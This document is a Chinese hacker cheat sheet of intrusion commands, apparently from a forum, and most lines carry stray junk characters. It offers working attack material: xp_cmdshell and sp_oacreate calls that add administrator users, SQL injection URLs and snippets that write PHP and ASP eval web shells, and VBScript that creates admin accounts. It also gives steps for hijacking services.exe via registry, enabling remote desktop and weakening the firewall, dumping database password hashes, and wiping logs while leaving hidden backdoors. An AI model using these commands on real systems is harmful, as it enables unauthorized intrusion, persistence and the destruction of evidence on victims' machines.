: d. B" G& g; u; L" S' y
1.net user administrator /passwordreq:no9 o* A. K/ u' l% I
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
/ Q5 S* {- o0 U9 U5 T2.比较巧妙的建克隆号的步骤$ S7 G* V5 w8 d/ p, \% t) B
先建一个user的用户; C2 P+ d* P A' p% a' z; Z
然后导出注册表。然后在计算机管理里删掉
5 c2 s. b" k6 b* T7 y4 c在导入,在添加为管理员组
& q2 b( X, C& e3.查radmin密码
4 I# @4 x3 R/ k8 N, v v; freg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg$ Z- J4 a9 C. ]! t d/ b8 c
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
. N# Q/ n8 z$ W7 l5 x% B建立一个"services.exe"的项" v$ k( @. A+ R5 ]% B
再在其下面建立(字符串值)
5 U C% }7 Z5 T键值为mu ma的全路径! H; `* Y8 P; q$ d& v. M* Q
5.runas /user:guest cmd
- ~2 f) s1 U8 ]8 \, S* V测试用户权限!, y' S$ f3 ~9 i0 ]
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
. \2 n; w! D y- b* l. c6 o7.入侵后漏洞修补、痕迹清理,后门置放:
3 Q) i3 ~/ t1 H基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
5 g- o% S% @+ E g5 C8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
( S) r9 \5 W; Q& `
$ c# @1 c9 W4 q: Y% I4 afor example
) x4 N# L- x. p" Q+ s! d. p( g, \$ S( n) M
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
& C( D( N9 T) g8 Q
7 J$ z0 \9 |+ v& Rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'1 d; r8 X2 `% J) U) F' i1 x
' a, t0 a- v$ l8 c3 c& X% e6 s
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了( z8 X& D: `9 x, T4 ?1 Y( j3 t
如果要启用的话就必须把他加到高级用户模式
" o+ o* V0 w: x4 B可以直接在注入点那里直接注入* k3 h: n( ^7 Q! D' A
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
. @+ I6 S$ M9 ^" H然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
9 U! J8 f4 P) T" r6 ^. i. R, o或者- R O1 I4 ~% p. H. E" T8 F
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
. e8 ^' V% ?* i& Z- m6 T来恢复cmdshell。! `, l7 p3 f0 j8 C/ J
, k1 g9 P; p t. G( f- r: \: L; [9 l3 w分析器
c9 X. F5 j' x; q% o! d$ XEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
* Z+ P4 [8 H. V; g. N. f然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
- C; B$ X# m" [ c- p+ E10.xp_cmdshell新的恢复办法
$ F$ w, A, C2 A# P, I1 Dxp_cmdshell新的恢复办法
" G+ l; |! O. \* h& b B$ v扩展储存过程被删除以后可以有很简单的办法恢复:% o4 n9 Q6 v" D4 N' j
删除6 u6 l4 E: u) ^2 ~5 @
drop procedure sp_addextendedproc# z- G# f2 m, K
drop procedure sp_oacreate, ? v0 h- S0 K% O
exec sp_dropextendedproc 'xp_cmdshell'
4 [$ T# b4 s, k# i4 q' F, r r% i) z: Z/ k h
恢复( T7 e9 p* x( [8 A
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
% H% k @! [& P2 j4 edbcc addextendedproc ("xp_cmdshell","xplog70.dll")+ L5 g- z! K7 y. Q4 P$ V* t
, @0 Y' G$ o+ V1 y& n这样可以直接恢复,不用去管sp_addextendedproc是不是存在! k% D# s8 M1 u/ x1 J% i6 y O
" F7 U4 K4 e% W. B2 Y6 j-----------------------------& Y6 q$ f1 T3 j6 g
, G/ ^4 N7 t1 \$ V) P
删除扩展存储过过程xp_cmdshell的语句:& h5 D, J/ [" w% W
exec sp_dropextendedproc 'xp_cmdshell'
1 l( u7 l9 S( F. u8 j
- D) [) E1 i3 c4 u% N$ i恢复cmdshell的sql语句* E6 }' j0 f& S6 J0 Q2 c: K
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
) |1 x" s3 m4 i1 d, ?
4 J! b) G0 J8 S! ^# c3 a& u5 X4 q4 w+ Q! {5 B! l& R* S
开启cmdshell的sql语句1 b) w( f7 s, v7 w0 {6 u3 r; a
S6 Z0 T# K) g& R
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
0 _1 s a1 {9 P) j+ O; b" ~* U0 Q% Y' e- F6 B5 V) T1 q8 [$ _
判断存储扩展是否存在
6 d* C. J. f" |" |4 ^; h9 ]select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
6 e. J# Y& Y; [) w# p- x. \) x返回结果为1就ok/ a/ Z& v) f! C% a
7 \. d% ~6 D. E, K' i1 I: s: h
恢复xp_cmdshell
* z) N- j# h$ rexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
# c% S" G* i; B; g% q6 n返回结果为1就ok* Q2 ~4 M" X7 B& ^. K
# P. i" Q+ k9 n }+ ?+ c+ _! V
否则上传xplog7.0.dll f2 @2 q/ @9 B
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'- F- i! R$ i! b
2 v) A: H5 V7 N" ?( T
堵上cmdshell的sql语句
# d- N, C" Y" `5 Z4 h' Tsp_dropextendedproc "xp_cmdshel) g" ?+ `% N3 [/ o! U" q
-------------------------. k7 }& m& a9 }3 X& s( s V6 a
清除3389的登录记录用一条系统自带的命令:
7 y7 p" [4 q" A) E' ^- s, zreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
+ I1 [6 Y) e2 m1 w7 ~
( ~) [* Z% ~- F X然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
' ^1 i& V# x3 w3 K) q8 `% ^在 mysql里查看当前用户的权限
8 N% @0 L6 f- u% p9 N% Y/ fshow grants for
. y# [+ c% i' B$ I4 O2 u3 K! E& ]
$ X4 T; F0 o$ {1 X- |5 X, F, H- H以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。1 \* }- A* {8 W& h* W. T% ]& b: C
2 y4 R) P a0 Q. ^- c
, s3 K& K* r: v% [4 c N7 {
Create USER 'itpro'@'%' IDENTIFIED BY '123';& f. }( V+ b+ l0 [9 X
; t+ k, L9 U; J% aGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION0 o# y D; ^/ }, v( x4 E
' l. i: n! B, H# j1 LMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0' y! \4 r& j. _
8 J1 }+ t, Y) l1 VMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;0 c% s$ l6 ^* y4 Y/ c- T/ o* j! g- X2 l7 u
" h# O0 ^' v9 |; L9 K$ e3 h) X5 U搞完事记得删除脚印哟。' V3 G6 M2 M; a
6 m! F' ~2 e* T5 YDrop USER 'itpro'@'%';
8 P5 B) j4 _5 J5 T$ l6 Z
- u% ^8 i7 k$ m- K7 q1 \1 WDrop DATABASE IF EXISTS `itpro` ;
, T' _' ^( h) m7 O O* N' t8 @/ t$ O3 S3 A" a3 J3 Y: k" Z
当前用户获取system权限
( w3 q1 i- r5 h _ G W: ?0 hsc Create SuperCMD binPath= "cmd /K start" type= own type= interact0 G1 j6 Z9 R5 _9 C; m
sc start SuperCMD
3 d Z# f% R8 {& d" e9 U程序代码
) c* L& Z% \8 b% S' R U<SCRIPT LANGUAGE="VBScript">7 _' u: Y; O2 O( J3 |( f
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
+ i8 L* C! c0 |3 P. G6 e1 nos="WinNT://"&wsnetwork.ComputerName" w/ W. _3 m$ {" ^0 Z
Set ob=GetObject(os)
1 U/ ]# q8 d# t& x aSet oe=GetObject(os&"/Administrators,group")
2 q3 n: E8 _, q1 ySet od=ob.Create("user","nosec")
. e5 P6 o3 N. d; a$ @5 q# {od.SetPassword "123456abc!@#"
7 |5 S/ y1 i0 zod.SetInfo
# U! X2 w% f! lSet of=GetObject(os&"/nosec",user): h: i6 x$ u# G) s! R2 G! r; [2 q
oe.add os&"/nosec"6 e& K/ r: [, `0 z0 a# l
</Script>, w/ M; U5 ?% i& R+ d( y1 W7 f* F: u5 j- I
<script language=javascript>window.close();</script>
7 l* i; _2 Z7 ~& B. e" N. s0 W* K( D6 B# L+ y
- }/ u: X$ b. g! Z5 w4 d
5 z- U, N H, l! n/ n
+ ]8 a: P& G; l% Q6 a) f突破验证码限制入后台拿shell6 t' Z" h: H# o9 J
程序代码
/ L- Z2 _ b, a% |# b9 SREGEDIT4 0 d V% w" J6 C' x
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
: A* f3 h/ w1 w9 T% I4 A"BlockXBM"=dword:00000000
" j/ g2 V5 Z# j0 I1 u/ y
3 Q4 c1 O0 J! q" C5 P m保存为code.reg,导入注册表,重器IE3 O! M/ {! X% Y$ W5 N$ V5 h
就可以了# Y0 w% i' h# ?( |" s
union写马% O2 L4 C$ K9 t1 a4 `& a
程序代码1 G5 c2 W" s7 D: c
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*. t3 O( h4 r- I/ g$ S% y% i4 Y
; A/ e$ ~, u1 Y! U' K" L应用在dedecms注射漏洞上,无后台写马
% ~) `+ h3 q" ]9 P; F# ?dedecms后台,无文件管理器,没有outfile权限的时候
}% A% t7 j" t( ~! H' F在插件管理-病毒扫描里! d, ?' L: Y. k9 ?1 _
写一句话进include/config_hand.php里 c( J. k& J, ?4 u. n! I/ r
程序代码! R& p0 e6 K' L+ b7 h
>';?><?php @eval($_POST[cmd]);?>
! z; B) R9 C, A/ j v) b# B' R3 x# ~# ]2 c# P4 O5 p6 ?
' i4 F m5 {# ^ B/ ^如上格式
7 b1 s9 ~/ F/ \9 u
+ a( p0 N6 L9 d1 [+ Qoracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解7 v# z4 K w; s
程序代码
/ G# t3 k. u4 J4 F- @9 lselect username,password from dba_users;
7 }3 ~$ i, N. {) O
6 C( m" z* z1 m3 Q3 F6 a! W: A: M6 {! J. w
mysql远程连接用户; |4 p! L# y6 F2 r$ t
程序代码$ S; `( {( x; n, V3 z
8 g' x4 L& }; U+ o1 a: NCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';; i6 m2 f% a8 N5 [ L
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
+ f7 P: z V, s) EMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0) ?0 f7 y8 ^# F0 t
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;5 V" c; i" \8 w0 K
6 ]9 d( Z5 H* t" W% |6 B$ Z; ~
* p, l5 H) P3 Y" f, E4 ?
! j: C2 A0 q+ k( S3 ^: Z* m) i6 N8 i% i$ A" |; W
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0+ R, k; b! l8 @. m/ _9 G6 }/ P
! b E& `( s t/ u9 ]/ [+ p
1.查询终端端口
, U, z7 N3 D; E$ ^3 k$ v9 \' K: l/ K: n; Z
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber, t7 y8 U2 g5 s% r& i; [
* P l4 B8 ]/ e4 c6 Q通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"1 h* H# A& ~7 I | s3 W8 ^
type tsp.reg/ b' u/ |' x' Z
' K/ P# j) e' y
2.开启XP&2003终端服务
4 P+ F* o7 d: i) O' x0 G3 L1 W. m4 [
9 A7 t) a b, \8 _+ t$ U
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
* C* M6 Y9 y9 Z c2 L& G# M2 o' f+ [* N% J
" c+ b& m/ X h% F0 _' F1 b$ }
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f8 R1 X3 Z$ u& a8 Q' w
& A; ~+ g' z# n4 e% x8 F1 V9 F3.更改终端端口为20008(0x4E28)/ }8 T; q8 X' n' {6 M5 s7 A
* `3 _+ H8 C5 ?5 S$ J1 t/ [8 KREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
6 e* h* B4 |0 A9 e2 w% Y6 N
3 j W; e& O: h7 B1 C- C9 xREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f9 m) p( n& m, i( h$ d7 p7 Z
, d ^+ A: V$ V4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
( V2 I4 m( x& \) D4 H
6 V5 y9 B! @ H5 t; aREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
/ o i7 C5 t7 e. N$ ]: Y- i$ G! g! z" R
* H- g( c6 o% `7 W* q* A+ t- |5.开启Win2000的终端,端口为3389(需重启)
: J q9 F: c( i/ e+ |1 t9 [! |, |' o( ^5 ]# ~' k F
echo Windows Registry Editor Version 5.00 >2000.reg ! s: f0 k4 J3 c! h$ j
echo. >>2000.reg* U, u5 c2 ]* ]3 K! W+ b
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg + n5 {/ N) h5 d* B8 c
echo "Enabled"="0" >>2000.reg
) [9 Q$ Y7 ?7 _; \- k! g" h8 Eecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
! W2 S* Y" X% jecho "ShutdownWithoutLogon"="0" >>2000.reg + T$ F! p( m( G9 @# m0 Q! p3 |) Q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg & O. {" t% ]" j. ?
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
' ]* b- W, E% L7 U+ S9 `echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg $ r- z7 m1 X/ ]
echo "TSEnabled"=dword:00000001 >>2000.reg
% i6 n# f0 m% Q) o6 Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg + V* v2 u( ?- F
echo "Start"=dword:00000002 >>2000.reg
. E5 Y7 r, c7 recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
& ]+ ^. _1 V: Y- W* I) Zecho "Start"=dword:00000002 >>2000.reg
# R1 t! U- \1 q. ?6 S8 s$ P, |echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 9 A3 ~7 Z0 `) J& S5 k4 C
echo "Hotkey"="1" >>2000.reg
& k: |0 Y: Y% t0 ^0 B$ jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
- h# a5 y' Q# T& W& h2 ?, Recho "ortNumber"=dword:00000D3D >>2000.reg ! ~4 e- `5 i/ b: @- j8 Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 1 P" O0 u! P& y& O. r
echo "ortNumber"=dword:00000D3D >>2000.reg) T |4 ?6 |2 T' D
9 G1 x# f a9 `7 V: z* p8 v
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
9 X( O! ~( U* v. j& n: ]8 k; h6 P/ X* m/ a
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
$ M5 D0 Y# @9 k' v; f! x9 R2 x(set inf=InstallHinfSection DefaultInstall); h3 W4 q2 c8 H8 G* y
echo signature=$chicago$ >> restart.inf/ h) E6 E( ^7 I' G3 h2 I
echo [defaultinstall] >> restart.inf9 }5 Q' H5 `4 t
rundll32 setupapi,%inf% 1 %temp%\restart.inf
1 U6 G0 y- o* r9 |9 l4 m$ }# C- x
* p, L5 F8 q4 H; f3 s0 s" r: u( U0 j: S( a. z
7.禁用TCP/IP端口筛选 (需重启)
) ~; c4 Y; q4 E/ u. V0 p
% ?: ]3 |! [! d1 s) \REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f. h4 t* u, U0 x7 p+ B& g1 B9 p
& ~+ W+ m" C' t% I4 D, U8.终端超出最大连接数时可用下面的命令来连接7 L/ E7 }) ?9 {9 G6 @8 Y9 A
6 O' m/ n6 r( D$ y/ r3 s
mstsc /v:ip:3389 /console, n3 m8 d) x3 ]( L
. Q2 o- H1 _$ w9.调整NTFS分区权限" k1 E+ z3 K8 N" s8 }
; z0 n. S7 O8 P- ]2 q0 M; }cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)" F. ?/ m. x, b- z$ G3 t0 Q- h$ Z8 f
4 e. J- a# {- r4 M
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
. j2 |$ ` p5 |& b# }3 {* l% }4 _
. }7 p8 x% F- P- x! n------------------------------------------------------. X$ Q) [& S" j8 A$ ]6 e" D5 A
3389.vbs
; k+ F1 c% X. T5 L0 COn Error Resume Next
. @4 i5 B. E$ Xconst HKEY_LOCAL_MACHINE = &H800000024 G0 N3 T9 t1 w3 w, g% w
strComputer = "."5 m* b" `, e7 o# }0 D% d! E
Set StdOut = WScript.StdOut
0 U$ r& o# i1 Z1 _/ JSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
$ @! Y/ S2 m1 h$ `7 V: S$ wstrComputer & "\root\default:StdRegProv")
6 H6 v& w0 ^9 H) `3 pstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
7 K# R# E9 Z" h) p, ?" [, q( poreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
& }( q7 a0 \2 j# m) _' J$ DstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"5 O6 t2 _2 a3 ^
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
|5 r5 ^1 y* i9 j# cstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"! Y; {; Y! p3 R5 N6 c S( C
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"9 Y; z" Y0 _ J& L5 m
strValueName = "fDenyTSConnections"5 A! b% ?/ Y$ ?1 I$ H
dwValue = 0
) x/ N% n: [2 z( u6 {oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue6 `) }# r1 @, z' M3 f& v
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp". i5 U& Z0 H7 r& f* w6 L6 I3 X
strValueName = "ortNumber"/ n5 z0 D1 r+ Y; K1 o. v% g
dwValue = 3389
6 z/ w$ ^% Z; z+ |2 t6 d( Aoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
2 J& x, ]( q' r! g7 ustrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
; U3 h+ s( r$ R& X: t2 `. x( EstrValueName = "ortNumber"$ ~* `" f, y8 f, b
dwValue = 3389
( r& \/ x8 V" `7 y( `oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
2 m2 ^, u& R- k5 s! K- YSet R = CreateObject("WScript.Shell") 4 g1 W3 C; n% U
R.run("Shutdown.exe -f -r -t 0")
$ q# d% H; G! y. y& R7 {
! r+ f1 z# W7 I: \5 J& E删除awgina.dll的注册表键值 M' P P- S6 D* Z; h3 o3 H5 U
程序代码
8 w ]7 S. a/ D j0 Z4 t5 A! t" y: j/ m; e% @+ m% C% Z
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f0 `/ i L. z5 K) B- ^
) N5 `' P9 v) S |( T6 `# G
4 n( p) m" H9 O7 f4 K1 Y& D2 ?6 ~
: C9 r( @- ^! z5 B8 P E5 `1 e! V* c* V
程序代码
+ {- {% A2 H% w9 cHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash0 u) e& g+ t% O. s/ q4 o
+ L6 B# ^( @) w' C设置为1,关闭LM Hash
/ a1 k7 F5 B: x' k) B2 F6 K5 J+ `; K1 Q" N. T; {- f7 S
数据库安全:入侵Oracle数据库常用操作命令
! q; `- B9 I y, E8 `最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。 G) B/ X0 r0 c6 Q% @1 Y
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。$ B/ U% k1 C1 u$ _) w- f
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
9 }% ?8 W/ g- V. ^3、SQL>connect / as sysdba ;(as sysoper)或
, Y- H( Q5 i& x( [& B+ [% jconnect internal/oracle AS SYSDBA ;(scott/tiger)
3 a% h) A6 v: D1 M9 Dconn sys/change_on_install as sysdba;
# f. R* K9 R$ k( s4、SQL>startup; 启动数据库实例
. k; u! O, O, T5 B* ]& J: ~5、查看当前的所有数据库: select * from v$database;
) `: ]5 j1 h, J2 `( h: Bselect name from v$database;
2 t3 [0 f ~0 G6、desc v$databases; 查看数据库结构字段
) Q% v# r Z' I. b7 F9 `7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
6 l0 b8 t5 j) e! J; OSQL>select * from V_$PWFILE_USERS;
9 [) N3 s3 i3 KShow user;查看当前数据库连接用户
# S, M% T' h" E0 P) ^8 X# O$ ?' t8、进入test数据库:database test;
- |/ w% |- T& ?6 b9、查看所有的数据库实例:select * from v$instance;
4 ~# q2 h4 s' { Z& o: w8 M2 J如:ora9i
- A4 d& l: c8 h: {; ?& p. I( e/ s10、查看当前库的所有数据表:
/ [- [9 {1 w2 S7 }- {+ V$ W" @SQL> select TABLE_NAME from all_tables;
, w% E: j$ V3 w2 uselect * from all_tables;" u8 U$ ^9 S& Z; h. B' `
SQL> select table_name from all_tables where table_name like '%u%';
. m; J# }$ G, X5 GTABLE_NAME
- d3 w& k6 x& Y9 i------------------------------( F* k8 G* @3 R4 A7 l: i
_default_auditing_options_" S( m6 o) z3 Q9 l6 [% C) r
11、查看表结构:desc all_tables;
0 P' N! q Y E8 u2 r6 g12、显示CQI.T_BBS_XUSER的所有字段结构:
2 i. _/ r& s! ddesc CQI.T_BBS_XUSER;
4 C/ E }- {; b3 M; |2 e( `0 x13、获得CQI.T_BBS_XUSER表中的记录:
+ l; K; [1 R- I! e2 g& qselect * from CQI.T_BBS_XUSER;
1 o% h, [7 c' r" m5 x14、增加数据库用户:(test11/test)
4 W& q5 w' s5 F, p* Ncreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
3 A6 ]! Z$ p/ U. l% E5 ^, o15、用户授权:
; s& l5 b+ W, ~grant connect,resource,dba to test11;
3 J* y& l- T; H) K- Xgrant sysdba to test11;" M4 n2 q0 e/ r5 R) u1 I4 f
commit;
6 j$ D" E* c# {7 u3 Q) J16、更改数据库用户的密码:(将sys与system的密码改为test.)$ w& x: t c H/ V2 A. i& I h: U( {
alter user sys indentified by test;
$ b' d- Q) @1 T5 `8 g, dalter user system indentified by test;
n3 u$ ?' P% C1 Y# V* I9 D, \9 g+ }- ]% g
applicationContext-util.xml
2 U% V; D# I& c0 eapplicationContext.xml) a/ \8 U- |& ^1 ]1 m5 B2 |
struts-config.xml4 Y' Z8 q( d2 \; p" Z& h
web.xml9 a+ X! g. T" u6 h2 I
server.xml
; p% e# K. Q" J& F rtomcat-users.xml
. K* k- ^/ x' U3 chibernate.cfg.xml/ Q; \9 e8 V! N3 }# e1 ]7 l0 P
database_pool_config.xml7 a9 k4 N/ m- [' l3 m
* `: S% r1 P- [+ Y U$ n
7 z- K/ J @+ K! Q# d( ~% y7 M2 N8 J\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置9 }& z( g4 o' a( S
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini; M( ~# u0 B& W8 U( F6 k
\WEB-INF\struts-config.xml 文件目录结构2 t; C$ v/ C) [" m3 ]$ W
1 I* u' o3 e. y) I/ F4 z
spring.properties 里边包含hibernate.cfg.xml的名称
3 s; c! y# R' t6 W/ j8 N* Y! R/ z4 U- c/ r3 v1 \( M
; U0 y1 u! v) o- D$ p- w: gC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
7 o# ~, s* H0 [8 H# `, Z! ]
+ U" g8 A- R" e$ M如果都找不到 那就看看class文件吧。。
: V( e, E" @& V' z& o
$ @; d5 C, F6 o! W" U2 \+ r) B测试1:
) p) w& [* A0 X. `SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
" N2 k( H+ t$ n) U" V' U, x$ y+ f6 i5 I7 h# W3 D% F K
测试2:
3 K8 @8 p; h8 E3 I' C5 q7 Y$ O; m6 o3 W+ T9 v
create table dirs(paths varchar(100),paths1 varchar(100), id int)3 G+ }+ [7 b' |0 D% N7 Y- r# y
' R, K9 m4 z6 R: s5 C
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--9 ^2 E% C( ~. S, |( q" I$ g H0 W
! Z9 m2 C7 L: H9 y& d& P! @
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t13 _9 L% t" H* _$ h# \" Y
" w G8 u" W6 m. t$ x0 @. |* y6 n/ ~
查看虚拟机中的共享文件:
4 i) ?& Y7 b3 J: _# L在虚拟机中的cmd中执行
/ h; y4 u4 Q0 W/ p9 z# ~% e* y) q: F\\.host\Shared Folders7 @. \& \, O/ u
0 \- z9 e8 v: _
cmdshell下找终端的技巧4 \9 R6 X; ^9 b) i# J
找终端: # F4 N. T( V7 W. p
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
# e/ i7 z3 ?& Q 而终端所对应的服务名为:TermService
5 }4 b) r- t4 t, m2 b" K* P第二步:用netstat -ano命令,列出所有端口对应的PID值! 9 m9 `6 Z3 D% `( m- {
找到PID值所对应的端口9 Y& P8 Q) n& r
2 r- F3 c3 a3 C6 v+ l查询sql server 2005中的密码hash9 B/ G8 K- {0 J+ O1 R. Q! B2 n
SELECT password_hash FROM sys.sql_logins where name='sa'* B7 A. R; n& O+ G& t
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
: ^( C k( x. N( [! ]! T$ iaccess中导出shell
* |% q" F: }: Q( j
/ ^& @, w* [6 z. D/ i5 D' C7 F中文版本操作系统中针对mysql添加用户完整代码:
. f5 ]1 g t! y% }/ U R$ U0 |
+ g1 l9 x8 y1 [5 I, I# J$ Luse test;
